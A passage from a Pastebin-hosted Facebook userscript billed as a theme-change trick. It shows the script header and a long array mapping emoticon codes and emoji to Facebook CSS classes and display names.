Advertisement
Quan1

Code theme

Apr 24th, 2014
57
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 117.95 KB | None | 0 0
  1. // ==UserScript==
  2. // @name Update Thủ thuật thay đổi theme FB mới
  3. // @description All about facebook By Teppy Nhóc Siêu Quậy
  4. // @include https://*.facebook.com/*
  5. // @include https://*.facebook.com/*/*
  6. // @include http://*.facebook.com/*
  7. // @include http://*.facebook.com/*/*
  8. // ==/UserScript==
  9. // ==13470X==
  10. // ==============
  11. // ==Icon==
  12. (function() {
  13. // Active only in main frame
  14. if (!document.querySelector("#pageNav")) {
  15. return;
  16. }
  17. //console.info("Extra Facebook Smileys");
  18.  
  19. // = Data =======
  20. var emoticons = [ { // Text to picture emoticons
  21. "chars" : " :) ",
  22. "class" : "emoticon_smile",
  23. "name" : "Smiley"
  24. }, {
  25. "chars" : " :( ",
  26. "class" : "emoticon_frown",
  27. "name" : "Frown"
  28. }, {
  29. "chars" : " :P ",
  30. "class" : "emoticon_tongue",
  31. "name" : "Tongue"
  32. }, {
  33. "chars" : " :D ",
  34. "class" : "emoticon_grin",
  35. "name" : "Grin"
  36. }, {
  37. "chars" : " :o ",
  38. "class" : "emoticon_gasp",
  39. "name" : "Gasp"
  40. }, {
  41. "chars" : " ;) ",
  42. "class" : "emoticon_wink",
  43. "name" : "Wink"
  44. }, {
  45. "chars" : " :v ",
  46. "class" : "emoticon_pacman",
  47. "name" : "Pacman"
  48. }, {
  49. "chars" : " >:( ",
  50. "class" : "emoticon_grumpy",
  51. "name" : "Gruñón"
  52. }, {
  53. "chars" : " :/ ",
  54. "class" : "emoticon_unsure",
  55. "name" : "Unsure"
  56. }, {
  57. "chars" : " :'( ",
  58. "class" : "emoticon_cry",
  59. "name" : "Cry"
  60. }, {
  61. "chars" : " ^_^ ",
  62. "class" : "emoticon_kiki",
  63. "name" : "Kiki"
  64. }, {
  65. "chars" : " 8) ",
  66. "class" : "emoticon_glasses",
  67. "name" : "Glasses"
  68. }, {
  69. "chars" : " B| ",
  70. "class" : "emoticon_sunglasses",
  71. "name" : "Sunglasses"
  72. }, {
  73. "chars" : " <3 ",
  74. "class" : "emoticon_heart",
  75. "name" : "Heart"
  76. }, {
  77. "chars" : " 3:) ",
  78. "class" : "emoticon_devil",
  79. "name" : "Devil"
  80. }, {
  81. "chars" : " O:) ",
  82. "class" : "emoticon_angel",
  83. "name" : "Angel"
  84. }, {
  85. "chars" : " -_- ",
  86. "class" : "emoticon_squint",
  87. "name" : "Squint"
  88. }, {
  89. "chars" : " o.O ",
  90. "class" : "emoticon_confused",
  91. "name" : "Confused"
  92. }, {
  93. "chars" : " >:o ",
  94. "class" : "emoticon_upset",
  95. "name" : "Upset"
  96. }, {
  97. "chars" : " :3 ",
  98. "class" : "emoticon_colonthree",
  99. "name" : "Colonthree"
  100. }, {
  101. "chars" : " (y) ",
  102. "class" : "emoticon_like",
  103. "name" : "Like"
  104. }, {
  105. "chars" : " :* ",
  106. "class" : "emoticon emoticon_kiss",
  107. "name" : "Kiss"
  108. }, {
  109. "chars" : " (^^^) ",
  110. "class" : "emoticon_shark",
  111. "name" : "Shark"
  112. }, {
  113. "chars" : " :|] ",
  114. "class" : "emoticon_robot",
  115. "name" : "Robot"
  116. }, {
  117. "chars" : " <(\") ",
  118. "class" : "emoticon_penguin",
  119. "name" : "Pingüino"
  120. }, {
  121. "chars" : " :poop: ",
  122. "class" : "emoticon_poop",
  123. "name" : "Poop"
  124. }, {
  125. "chars" : " :putnam: ",
  126. "class" : "emoticon_putnam",
  127. "name" : "Putman"
  128. }, {
  129. "chars" : " \ud83c\udf02 ",
  130. "class" : "_1az _1a- _2c0",
  131. "name" : "Pink Umbrella"
  132. }, {
  133. "chars" : " \ud83c\udf0a ",
  134. "class" : "_1az _1a- _2c1",
  135. "name" : "Sea Wave"
  136. }, {
  137. "chars" : " \ud83c\udf19 ",
  138. "class" : "_1az _1a- _2c2",
  139. "name" : "Crescent moon"
  140. }, {
  141. "chars" : " \ud83c\udf1f ",
  142. "class" : "_1az _1a- _2c3",
  143. "name" : "Bright Star"
  144. }, {
  145. "chars" : " \ud83c\udf31 ",
  146. "class" : "_1az _1a- _2c4",
  147. "name" : "Seedbed"
  148. }, {
  149. "chars" : " \ud83c\udf34 ",
  150. "class" : "_1az _1a- _2c5",
  151. "name" : "Single Palm Tree"
  152. }, {
  153. "chars" : " \ud83c\udf35 ",
  154. "class" : "_1az _1a- _2c6",
  155. "name" : "Cactus"
  156. }, {
  157. "chars" : " \ud83c\udf37 ",
  158. "class" : "_1az _1a- _2c7",
  159. "name" : "Tulip"
  160. }, {
  161. "chars" : " \ud83c\udf38 ",
  162. "class" : "_1az _1a- _2c8",
  163. "name" : "Cherry Blossom"
  164. }, {
  165. "chars" : " \ud83c\udf39 ",
  166. "class" : "_1az _1a- _2c9",
  167. "name" : "Rose"
  168. }, {
  169. "chars" : " \ud83c\udf3a ",
  170. "class" : "_1az _1a- _2ca",
  171. "name" : "Cayenne"
  172. }, {
  173. "chars" : " \ud83c\udf3b ",
  174. "class" : "_1az _1a- _2cb",
  175. "name" : "Sunflower"
  176. }, {
  177. "chars" : " \ud83c\udf3e ",
  178. "class" : "_1az _1a- _2cc",
  179. "name" : "Ear Of Rice"
  180. }, {
  181. "chars" : " \ud83c\udf40 ",
  182. "class" : "_1az _1a- _2cd",
  183. "name" : "Four Leaf Clover"
  184. }, {
  185. "chars" : " \ud83c\udf41 ",
  186. "class" : "_1az _1a- _2ce",
  187. "name" : "Maple Leaf"
  188. }, {
  189. "chars" : " \ud83c\udf42 ",
  190. "class" : "_1az _1a- _2cf",
  191. "name" : "Fallen Leaf"
  192. }, {
  193. "chars" : " \ud83c\udf43 ",
  194. "class" : "_1az _1a- _2cg",
  195. "name" : "Leaf Floating In The Wind"
  196. }, {
  197. "chars" : " \ud83c\udf4a ",
  198. "class" : "_1az _1a- _2ch",
  199. "name" : "Tangerine"
  200. }, {
  201. "chars" : " \ud83c\udf4e ",
  202. "class" : "_1az _1a- _2ci",
  203. "name" : "Red Apple"
  204. }, {
  205. "chars" : " \ud83c\udf53 ",
  206. "class" : "_1az _1a- _2cj",
  207. "name" : "Strawberry"
  208. }, {
  209. "chars" : " \ud83c\udf54 ",
  210. "class" : "_1az _1a- _2ck",
  211. "name" : "Burger"
  212. }, {
  213. "chars" : " \ud83c\udf78 ",
  214. "class" : "_1az _1a- _2cl",
  215. "name" : "Cocktail Glass"
  216. }, {
  217. "chars" : " \ud83c\udf7a ",
  218. "class" : "_1az _1a- _2cm",
  219. "name" : "Tankard"
  220. }, {
  221. "chars" : " \ud83c\udf81 ",
  222. "class" : "_1az _1a- _2cn",
  223. "name" : "Gift Wrapped"
  224. }, {
  225. "chars" : " \ud83c\udf83 ",
  226. "class" : "_1az _1a- _2co",
  227. "name" : "Pumpkin With Candle"
  228. }, {
  229. "chars" : " \ud83c\udf84 ",
  230. "class" : "_1az _1a- _2cp",
  231. "name" : "Christmas Tree"
  232. }, {
  233. "chars" : " \ud83c\udf85 ",
  234. "class" : "_1az _1a- _2cq",
  235. "name" : "Santa"
  236. }, {
  237. "chars" : " \ud83c\udf88 ",
  238. "class" : "_1az _1a- _2cr",
  239. "name" : "Balloon"
  240. }, {
  241. "chars" : " \ud83c\udf89 ",
  242. "class" : "_1az _1a- _2cs",
  243. "name" : "Party Popper"
  244. }, {
  245. "chars" : " \ud83c\udf8d ",
  246. "class" : "_1az _1a- _2ct",
  247. "name" : "Pine Decor"
  248. }, {
  249. "chars" : " \ud83c\udf8e ",
  250. "class" : "_1az _1a- _2cu",
  251. "name" : "Japanese Dolls"
  252. }, {
  253. "chars" : " \ud83c\udf8f ",
  254. "class" : "_1az _1a- _2cv",
  255. "name" : "Carp Streamer"
  256. }, {
  257. "chars" : " \ud83c\udf90 ",
  258. "class" : "_1az _1a- _2cw",
  259. "name" : "Wind Chime"
  260. }, {
  261. "chars" : " \ud83c\udf93 ",
  262. "class" : "_1az _1a- _2cx",
  263. "name" : "Graduation Cap"
  264. }, {
  265. "chars" : " \ud83c\udfb5 ",
  266. "class" : "_1az _1a- _2cy",
  267. "name" : "Musical Note"
  268. }, {
  269. "chars" : " \ud83c\udfb6 ",
  270. "class" : "_1az _1a- _2cz",
  271. "name" : "Multiple Musical Notes"
  272. }, {
  273. "chars" : " \ud83c\udfbc ",
  274. "class" : "_1az _1a- _2c-",
  275. "name" : "Musical Score"
  276. }, {
  277. "chars" : " \ud83d\udc0d ",
  278. "class" : "_1az _1a- _2c_",
  279. "name" : "Snake"
  280. }, {
  281. "chars" : " \ud83d\udc0e ",
  282. "class" : "_1az _1a- _2d0",
  283. "name" : "Horse"
  284. }, {
  285. "chars" : " \ud83d\udc11 ",
  286. "class" : "_1az _1a- _2d1",
  287. "name" : "Sheep"
  288. }, {
  289. "chars" : " \ud83d\udc12 ",
  290. "class" : "_1az _1a- _2d2",
  291. "name" : "Monkey"
  292. }, {
  293. "chars" : " \ud83d\udc14 ",
  294. "class" : "_1az _1a- _2d3",
  295. "name" : "Hen"
  296. }, {
  297. "chars" : " \ud83d\udc17 ",
  298. "class" : "_1az _1a- _2d4",
  299. "name" : "Wild Boar"
  300. }, {
  301. "chars" : " \ud83d\udc18 ",
  302. "class" : "_1az _1a- _2d5",
  303. "name" : "Elephant"
  304. }, {
  305. "chars" : " \ud83d\udc19 ",
  306. "class" : "_1az _1a- _2d6",
  307. "name" : "Octopus"
  308. }, {
  309. "chars" : " \ud83d\udc1a ",
  310. "class" : "_1az _1a- _2d7",
  311. "name" : "Snail Shell"
  312. }, {
  313. "chars" : " \ud83d\udc1b ",
  314. "class" : "_1az _1a- _2d8",
  315. "name" : "Insect"
  316. }, {
  317. "chars" : " \ud83d\udc1f ",
  318. "class" : "_1az _1a- _2d9",
  319. "name" : "Fish"
  320. }, {
  321. "chars" : " \ud83d\udc20 ",
  322. "class" : "_1az _1a- _2da",
  323. "name" : "Tropical Fish"
  324. }, {
  325. "chars" : " \ud83d\udc21 ",
  326. "class" : "_1az _1a- _2db",
  327. "name" : "Pufferfish"
  328. }, {
  329. "chars" : " \ud83d\udc25 ",
  330. "class" : "_1az _1a- _2dc",
  331. "name" : "Chick In Front"
  332. }, {
  333. "chars" : " \ud83d\udc26 ",
  334. "class" : "_1az _1a- _2dd",
  335. "name" : "Bird"
  336. }, {
  337. "chars" : " \ud83d\udc27 ",
  338. "class" : "_1az _1a- _2de",
  339. "name" : "Penguin"
  340. }, {
  341. "chars" : " \ud83d\udc28 ",
  342. "class" : "_1az _1a- _2df",
  343. "name" : "Koala"
  344. }, {
  345. "chars" : " \ud83d\udc29 ",
  346. "class" : "_1az _1a- _2dg",
  347. "name" : "Poodle"
  348. }, {
  349. "chars" : " \ud83d\udc2b ",
  350. "class" : "_1az _1a- _2dh",
  351. "name" : "Bactrian Camel"
  352. }, {
  353. "chars" : " \ud83d\udc2c ",
  354. "class" : "_1az _1a- _2di",
  355. "name" : "Dolphin"
  356. }, {
  357. "chars" : " \ud83d\udc2d ",
  358. "class" : "_1az _1a- _2dj",
  359. "name" : "Mouse Face"
  360. }, {
  361. "chars" : " \ud83d\udc2e ",
  362. "class" : "_1az _1a- _2dk",
  363. "name" : "Cow Face"
  364. }, {
  365. "chars" : " \ud83d\udc2f ",
  366. "class" : "_1az _1a- _2dl",
  367. "name" : "Cara de tigre"
  368. }, {
  369. "chars" : " \ud83d\udc30 ",
  370. "class" : "_1az _1a- _2dm",
  371. "name" : "Rabbit Face"
  372. }, {
  373. "chars" : " \ud83d\udc31 ",
  374. "class" : "_1az _1a- _2dn",
  375. "name" : "Cat Face"
  376. }, {
  377. "chars" : " \ud83d\udc33 ",
  378. "class" : "_1az _1a- _2do",
  379. "name" : "Whale Sputtering"
  380. }, {
  381. "chars" : " \ud83d\udc34 ",
  382. "class" : "_1az _1a- _2dp",
  383. "name" : "Horse Face"
  384. }, {
  385. "chars" : " \ud83d\udc35 ",
  386. "class" : "_1az _1a- _2dq",
  387. "name" : "Monkey Face"
  388. }, {
  389. "chars" : " \ud83d\udc37 ",
  390. "class" : "_1az _1a- _2dr",
  391. "name" : "Pig face"
  392. }, {
  393. "chars" : " \ud83d\udc38 ",
  394. "class" : "_1az _1a- _2ds",
  395. "name" : "Frog Face"
  396. }, {
  397. "chars" : " \ud83d\udc39 ",
  398. "class" : "_1az _1a- _2dt",
  399. "name" : "Hamster Face"
  400. }, {
  401. "chars" : " \ud83d\udc3a ",
  402. "class" : "_1az _1a- _2du",
  403. "name" : "Wolf Face"
  404. }, {
  405. "chars" : " \ud83d\udc3b ",
  406. "class" : "_1az _1a- _2dv",
  407. "name" : "Bear Face"
  408. }, {
  409. "chars" : " \ud83d\udc3e ",
  410. "class" : "_1az _1a- _2dw",
  411. "name" : "Footprints"
  412. }, {
  413. "chars" : " \ud83d\udc40 ",
  414. "class" : "_1az _1a- _2dx",
  415. "name" : "Eyes"
  416. }, {
  417. "chars" : " \ud83d\udc42 ",
  418. "class" : "_1az _1a- _2dy",
  419. "name" : "Ear"
  420. }, {
  421. "chars" : " \ud83d\udc43 ",
  422. "class" : "_1az _1a- _2dz",
  423. "name" : "Nose"
  424. }, {
  425. "chars" : " \ud83d\udc44 ",
  426. "class" : "_1az _1a- _2d-",
  427. "name" : "Mouth"
  428. }, {
  429. "chars" : " \ud83d\udc45 ",
  430. "class" : "_1az _1a- _2d_",
  431. "name" : "Sour Face"
  432. }, {
  433. "chars" : " \ud83d\udc46 ",
  434. "class" : "_1az _1a- _2e0",
  435. "name" : "White hand pointing up"
  436. }, {
  437. "chars" : " \ud83d\udc47 ",
  438. "class" : "_1az _1a- _2e1",
  439. "name" : "White hand faces downward"
  440. }, {
  441. "chars" : " \ud83d\udc48 ",
  442. "class" : "_1az _1a- _2e2",
  443. "name" : "White hand indicating left"
  444. }, {
  445. "chars" : " \ud83d\udc49 ",
  446. "class" : "_1az _1a- _2e3",
  447. "name" : "White hand indicating right"
  448. }, {
  449. "chars" : " \ud83d\udc4a ",
  450. "class" : "_1az _1a- _2e4",
  451. "name" : "Fist"
  452. }, {
  453. "chars" : " \ud83d\udc4b ",
  454. "class" : "_1az _1a- _2e5",
  455. "name" : "Hand in motion"
  456. }, {
  457. "chars" : " \ud83d\udc4c ",
  458. "class" : "_1az _1a- _2e6",
  459. "name" : "Hand showing all good"
  460. }, {
  461. "chars" : " \ud83d\udc4d ",
  462. "class" : "_1az _1a- _2e7",
  463. "name" : "Hand with thumb up"
  464. }, {
  465. "chars" : " \ud83d\udc4e ",
  466. "class" : "_1az _1a- _2e8",
  467. "name" : "Hand with thumb down"
  468. }, {
  469. "chars" : " \ud83d\udc4f ",
  470. "class" : "_1az _1a- _2e9",
  471. "name" : "Hands clapping"
  472. }, {
  473. "chars" : " \ud83d\udc50 ",
  474. "class" : "_1az _1a- _2ea",
  475. "name" : "Open Hands"
  476. }, {
  477. "chars" : " \ud83d\udc66 ",
  478. "class" : "_1az _1a- _2eb",
  479. "name" : "Boy"
  480. }, {
  481. "chars" : " \ud83d\udc67 ",
  482. "class" : "_1az _1a- _2ec",
  483. "name" : "Girl"
  484. }, {
  485. "chars" : " \ud83d\udc68 ",
  486. "class" : "_1az _1a- _2ed",
  487. "name" : "Man"
  488. }, {
  489. "chars" : " \ud83d\udc69 ",
  490. "class" : "_1az _1a- _2ee",
  491. "name" : "Woman"
  492. }, {
  493. "chars" : " \ud83d\udc6b ",
  494. "class" : "_1az _1a- _2ef",
  495. "name" : "Man and woman holding hands"
  496. }, {
  497. "chars" : " \ud83d\udc6e ",
  498. "class" : "_1az _1a- _2eg",
  499. "name" : "Police Officer"
  500. }, {
  501. "chars" : " \ud83d\udc6f ",
  502. "class" : "_1az _1a- _2eh",
  503. "name" : "Woman with bunny ears"
  504. }, {
  505. "chars" : " \ud83d\udc71 ",
  506. "class" : "_1az _1a- _2ei",
  507. "name" : "Person with hair rubio"
  508. }, {
  509. "chars" : " \ud83d\udc72 ",
  510. "class" : "_1az _1a- _2ej",
  511. "name" : "Man with pi mao gua"
  512. }, {
  513. "chars" : " \ud83d\udc73 ",
  514. "class" : "_1az _1a- _2ek",
  515. "name" : "Man with turban"
  516. }, {
  517. "chars" : " \ud83d\udc74 ",
  518. "class" : "_1az _1a- _2el",
  519. "name" : "Old Man"
  520. }, {
  521. "chars" : " \ud83d\udc75 ",
  522. "class" : "_1az _1a- _2em",
  523. "name" : "Old Woman"
  524. }, {
  525. "chars" : " \ud83d\udc76 ",
  526. "class" : "_1az _1a- _2en",
  527. "name" : "Baby"
  528. }, {
  529. "chars" : " \ud83d\udc77 ",
  530. "class" : "_1az _1a- _2eo",
  531. "name" : "Construction Worker"
  532. }, {
  533. "chars" : " \ud83d\udc78 ",
  534. "class" : "_1az _1a- _2ep",
  535. "name" : "Princess"
  536. }, {
  537. "chars" : " \ud83d\udc7b ",
  538. "class" : "_1az _1a- _2eq",
  539. "name" : "Ghost"
  540. }, {
  541. "chars" : " \ud83d\udc7c ",
  542. "class" : "_1az _1a- _2er",
  543. "name" : "Angel baby"
  544. }, {
  545. "chars" : " \ud83d\udc7d ",
  546. "class" : "_1az _1a- _2es",
  547. "name" : "Alien"
  548. }, {
  549. "chars" : " \ud83d\udc7e ",
  550. "class" : "_1az _1a- _2et",
  551. "name" : "Alien Monster"
  552. }, {
  553. "chars" : " \ud83d\udc7f ",
  554. "class" : "_1az _1a- _2eu",
  555. "name" : "Imp"
  556. }, {
  557. "chars" : " \ud83d\udc80 ",
  558. "class" : "_1az _1a- _2ev",
  559. "name" : "Skull"
  560. }, {
  561. "chars" : " \ud83d\udc82 ",
  562. "class" : "_1az _1a- _2ew",
  563. "name" : "Guard"
  564. }, {
  565. "chars" : " \ud83d\udc83 ",
  566. "class" : "_1az _1a- _2ex",
  567. "name" : "Ballerina"
  568. }, {
  569. "chars" : " \ud83d\udc85 ",
  570. "class" : "_1az _1a- _2ey",
  571. "name" : "Nail Polish"
  572. }, {
  573. "chars" : " \ud83d\udc8b ",
  574. "class" : "_1az _1a- _2ez",
  575. "name" : "Brand of kiss"
  576. }, {
  577. "chars" : " \ud83d\udc8f ",
  578. "class" : "_1az _1a- _2e-",
  579. "name" : "Kissing couple"
  580. }, {
  581. "chars" : " \ud83d\udc90 ",
  582. "class" : "_1az _1a- _2e_",
  583. "name" : "Bunch of flowers"
  584. }, {
  585. "chars" : " \ud83d\udc91 ",
  586. "class" : "_1az _1a- _2f0",
  587. "name" : "Couple with heart"
  588. }, {
  589. "chars" : " \ud83d\udc93 ",
  590. "class" : "_1az _1a- _2f1",
  591. "name" : "Heart beating"
  592. }, {
  593. "chars" : " \ud83d\udc94 ",
  594. "class" : "_1az _1a- _2f2",
  595. "name" : "Broken Heart"
  596. }, {
  597. "chars" : " \ud83d\udc96 ",
  598. "class" : "_1az _1a- _2f3",
  599. "name" : "Bright Heart"
  600. }, {
  601. "chars" : " \ud83d\udc97 ",
  602. "class" : "_1az _1a- _2f4",
  603. "name" : "Heart growing"
  604. }, {
  605. "chars" : " \ud83d\udc98 ",
  606. "class" : "_1az _1a- _2f5",
  607. "name" : "Heart with arrow"
  608. }, {
  609. "chars" : " \ud83d\udc99 ",
  610. "class" : "_1az _1a- _2f6",
  611. "name" : "Blue Heart"
  612. }, {
  613. "chars" : " \ud83d\udc9a ",
  614. "class" : "_1az _1a- _2f7",
  615. "name" : "Green Heart"
  616. }, {
  617. "chars" : " \ud83d\udc9b ",
  618. "class" : "_1az _1a- _2f8",
  619. "name" : "Yellow Heart"
  620. }, {
  621. "chars" : " \ud83d\udc9c ",
  622. "class" : "_1az _1a- _2f9",
  623. "name" : "Purple Heart"
  624. }, {
  625. "chars" : " \ud83d\udc9d ",
  626. "class" : "_1az _1a- _2fa",
  627. "name" : "Heart with ribbon"
  628. }, {
  629. "chars" : " \ud83d\udca2 ",
  630. "class" : "_1az _1a- _2fb",
  631. "name" : "Symbol of anger"
  632. }, {
  633. "chars" : " \ud83d\udca4 ",
  634. "class" : "_1az _1a- _2fc",
  635. "name" : "Sleeping"
  636. }, {
  637. "chars" : " \ud83d\udca6 ",
  638. "class" : "_1az _1a- _2fd",
  639. "name" : "Sweat Symbol"
  640. }, {
  641. "chars" : " \ud83d\udca8 ",
  642. "class" : "_1az _1a- _2fe",
  643. "name" : "Quick Start Symbol"
  644. }, {
  645. "chars" : " \ud83d\udca9 ",
  646. "class" : "_1az _1a- _2ff",
  647. "name" : "Pile of Caca"
  648. }, {
  649. "chars" : " \ud83d\udcaa ",
  650. "class" : "_1az _1a- _2fg",
  651. "name" : "Flexed bicep"
  652. }, {
  653. "chars" : " \ud83d\udcbb ",
  654. "class" : "_1az _1a- _2fh",
  655. "name" : "Personal Computer"
  656. }, {
  657. "chars" : " \ud83d\udcbd ",
  658. "class" : "_1az _1a- _2fi",
  659. "name" : "Mini Disco"
  660. }, {
  661. "chars" : " \ud83d\udcbe ",
  662. "class" : "_1az _1a- _2fj",
  663. "name" : "Floppy disk"
  664. }, {
  665. "chars" : " \ud83d\udcbf ",
  666. "class" : "_1az _1a- _2fk",
  667. "name" : "Optical Disc"
  668. }, {
  669. "chars" : " \ud83d\udcc0 ",
  670. "class" : "_1az _1a- _2fl",
  671. "name" : "DVD"
  672. }, {
  673. "chars" : " \ud83d\udcde ",
  674. "class" : "_1az _1a- _2fm",
  675. "name" : "Telephone receiver"
  676. }, {
  677. "chars" : " \ud83d\udce0 ",
  678. "class" : "_1az _1a- _2fn",
  679. "name" : "Fax"
  680. }, {
  681. "chars" : " \ud83d\udcf1 ",
  682. "class" : "_1az _1a- _2fo",
  683. "name" : "Mobile Phone"
  684. }, {
  685. "chars" : " \ud83d\udcf2 ",
  686. "class" : "_1az _1a- _2fp",
  687. "name" : "Mobile phone with arrow from left to right"
  688. }, {
  689. "chars" : " \ud83d\udcfa ",
  690. "class" : "_1az _1a- _2fq",
  691. "name" : "Television"
  692. }, {
  693. "chars" : " \ud83d\udd14 ",
  694. "class" : "_1az _1a- _2fr",
  695. "name" : "Bell"
  696. }, {
  697. "chars" : " \ud83d\ude01 ",
  698. "class" : "_1az _1a- _2fs",
  699. "name" : "Face to face with smiling eyes"
  700. }, {
  701. "chars" : " \ud83d\ude02 ",
  702. "class" : "_1az _1a- _2ft",
  703. "name" : "Face with tears of joy"
  704. }, {
  705. "chars" : " \ud83d\ude03 ",
  706. "class" : "_1az _1a- _2fu",
  707. "name" : "Smiley face with open mouth"
  708. }, {
  709. "chars" : " \ud83d\ude04 ",
  710. "class" : "_1az _1a- _2fv",
  711. "name" : "Face and eyes smiling with mouth open"
  712. }, {
  713. "chars" : " \ud83d\ude06 ",
  714. "class" : "_1az _1a- _2fw",
  715. "name" : "Smiley face with mouth open and eyes closed"
  716. }, {
  717. "chars" : " \ud83d\ude09 ",
  718. "class" : "_1az _1a- _2fx",
  719. "name" : "Face winking eye"
  720. }, {
  721. "chars" : " \ud83d\ude0b ",
  722. "class" : "_1az _1a- _2fy",
  723. "name" : "Guy savoring delicious food"
  724. }, {
  725. "chars" : " \ud83d\ude0c ",
  726. "class" : "_1az _1a- _2fz",
  727. "name" : "Relief face"
  728. }, {
  729. "chars" : " \ud83d\ude0d ",
  730. "class" : "_1az _1a- _2f-",
  731. "name" : "Smiley face with heart shaped eyes"
  732. }, {
  733. "chars" : " \ud83d\ude0f ",
  734. "class" : "_1az _1a- _2f_",
  735. "name" : "Smirk face"
  736. }, {
  737. "chars" : " \ud83d\ude12 ",
  738. "class" : "_1az _1a- _2g0",
  739. "name" : "Face of boredom"
  740. }, {
  741. "chars" : " \ud83d\ude13 ",
  742. "class" : "_1az _1a- _2g1",
  743. "name" : "Face with cold sweat"
  744. }, {
  745. "chars" : " \ud83d\ude14 ",
  746. "class" : "_1az _1a- _2g2",
  747. "name" : "Pensive face"
  748. }, {
  749. "chars" : " \ud83d\ude16 ",
  750. "class" : "_1az _1a- _2g3",
  751. "name" : "Confused face"
  752. }, {
  753. "chars" : " \ud83d\ude18 ",
  754. "class" : "_1az _1a- _2g4",
  755. "name" : "Throwing kiss Face"
  756. }, {
  757. "chars" : " \ud83d\ude1a ",
  758. "class" : "_1az _1a- _2g5",
  759. "name" : "Kissing face with eyes closed"
  760. }, {
  761. "chars" : " \ud83d\ude1c ",
  762. "class" : "_1az _1a- _2g6",
  763. "name" : "Face with tongue out and winking"
  764. }, {
  765. "chars" : " \ud83d\ude1d ",
  766. "class" : "_1az _1a- _2g7",
  767. "name" : "Face with tongue hanging out and eyes closed"
  768. }, {
  769. "chars" : " \ud83d\ude1e ",
  770. "class" : "_1az _1a- _2g8",
  771. "name" : "Face discouraged"
  772. }, {
  773. "chars" : " \ud83d\ude20 ",
  774. "class" : "_1az _1a- _2g9",
  775. "name" : "Face of anger"
  776. }, {
  777. "chars" : " \ud83d\ude21 ",
  778. "class" : "_1az _1a- _2ga",
  779. "name" : "Very angry face"
  780. }, {
  781. "chars" : " \ud83d\ude22 ",
  782. "class" : "_1az _1a- _2gb",
  783. "name" : "Crying Face"
  784. }, {
  785. "chars" : " \ud83d\ude23 ",
  786. "class" : "_1az _1a- _2gc",
  787. "name" : "Face of perseverance"
  788. }, {
  789. "chars" : " \ud83d\ude24 ",
  790. "class" : "_1az _1a- _2gd",
  791. "name" : "Face of triumph"
  792. }, {
  793. "chars" : " \ud83d\ude25 ",
  794. "class" : "_1az _1a- _2ge",
  795. "name" : "Face discouraged but relieved"
  796. }, {
  797. "chars" : " \ud83d\ude28 ",
  798. "class" : "_1az _1a- _2gf",
  799. "name" : "Scary face"
  800. }, {
  801. "chars" : " \ud83d\ude29 ",
  802. "class" : "_1az _1a- _2gg",
  803. "name" : "Fatigued face"
  804. }, {
  805. "chars" : " \ud83d\ude2a ",
  806. "class" : "_1az _1a- _2gh",
  807. "name" : "Sleeping face"
  808. }, {
  809. "chars" : " \ud83d\ude2b ",
  810. "class" : "_1az _1a- _2gi",
  811. "name" : "Tired face"
  812. }, {
  813. "chars" : " \ud83d\ude2d ",
  814. "class" : "_1az _1a- _2gj",
  815. "name" : "Face screaming"
  816. }, {
  817. "chars" : " \ud83d\ude30 ",
  818. "class" : "_1az _1a- _2gk",
  819. "name" : "Face with mouth open and cold sweat"
  820. }, {
  821. "chars" : " \ud83d\ude31 ",
  822. "class" : "_1az _1a- _2gl",
  823. "name" : "Terrified face of fear"
  824. }, {
  825. "chars" : " \ud83d\ude32 ",
  826. "class" : "_1az _1a- _2gm",
  827. "name" : "Very surprised face"
  828. }, {
  829. "chars" : " \ud83d\ude33 ",
  830. "class" : "_1az _1a- _2gn",
  831. "name" : "Face flushed"
  832. }, {
  833. "chars" : " \ud83d\ude35 ",
  834. "class" : "_1az _1a- _2go",
  835. "name" : "Face dizzy"
  836. }, {
  837. "chars" : " \ud83d\ude37 ",
  838. "class" : "_1az _1a- _2gp",
  839. "name" : "Face with medical mask"
  840. }, {
  841. "chars" : " \ud83d\ude38 ",
  842. "class" : "_1az _1a- _2gq",
  843. "name" : "Grinning Cat face and eyes closed"
  844. }, {
  845. "chars" : " \ud83d\ude39 ",
  846. "class" : "_1az _1a- _2gr",
  847. "name" : "Cat face with tears of laughter"
  848. }, {
  849. "chars" : " \ud83d\ude3a ",
  850. "class" : "_1az _1a- _2gs",
  851. "name" : "Smiling cat face with open mouth"
  852. }, {
  853. "chars" : " \ud83d\ude3b ",
  854. "class" : "_1az _1a- _2gt",
  855. "name" : "Smiling cat face with hearts in her eyes"
  856. }, {
  857. "chars" : " \ud83d\ude3c ",
  858. "class" : "_1az _1a- _2gu",
  859. "name" : "Face of cat smile twisted"
  860. }, {
  861. "chars" : " \ud83d\ude3d ",
  862. "class" : "_1az _1a- _2gv",
  863. "name" : "Cat face kissing with eyes closed"
  864. }, {
  865. "chars" : " \ud83d\ude3f ",
  866. "class" : "_1az _1a- _2gw",
  867. "name" : "Cat face crying"
  868. }, {
  869. "chars" : " \ud83d\ude40 ",
  870. "class" : "_1az _1a- _2gx",
  871. "name" : "Cat face scared terrified"
  872. }, {
  873. "chars" : " \ud83d\ude4b ",
  874. "class" : "_1az _1a- _2gy",
  875. "name" : "Happy person raising a hand"
  876. }, {
  877. "chars" : " \ud83d\ude4c ",
  878. "class" : "_1az _1a- _2gz",
  879. "name" : "Person holding up both hands in celebration"
  880. }, {
  881. "chars" : " \ud83d\ude4d ",
  882. "class" : "_1az _1a- _2g-",
  883. "name" : "Person frowning"
  884. }, {
  885. "chars" : " \ud83d\ude4f ",
  886. "class" : "_1az _1a- _2g_",
  887. "name" : "Person in prayer"
  888. }, {
  889. "chars" : " \u261d ",
  890. "class" : "_1az _1a- _2h0",
  891. "name" : "Index finger pointing up"
  892. }, {
  893. "chars" : " \u263a ",
  894. "class" : "_1az _1a- _2h1",
  895. "name" : "White face smiling"
  896. }, {
  897. "chars" : " \u26a1 ",
  898. "class" : "_1az _1a- _2h2",
  899. "name" : "High voltage symbol"
  900. }, {
  901. "chars" : " \u26c4 ",
  902. "class" : "_1az _1a- _2h3",
  903. "name" : "Snowless snowman"
  904. }, {
  905. "chars" : " \u270a ",
  906. "class" : "_1az _1a- _2h4",
  907. "name" : "Fist up"
  908. }, {
  909. "chars" : " \u270b ",
  910. "class" : "_1az _1a- _2h5",
  911. "name" : "Hand pointing up"
  912. }, {
  913. "chars" : " \u270c ",
  914. "class" : "_1az _1a- _2h6",
  915. "name" : "Winning Hand"
  916. }, {
  917. "chars" : " \u2600 ",
  918. "class" : "_1az _1a- _2h7",
  919. "name" : "Sun With Rays"
  920. }, {
  921. "chars" : " \u2601 ",
  922. "class" : "_1az _1a- _2h8",
  923. "name" : "Cloud"
  924. }, {
  925. "chars" : " \u2614 ",
  926. "class" : "_1az _1a- _2h9",
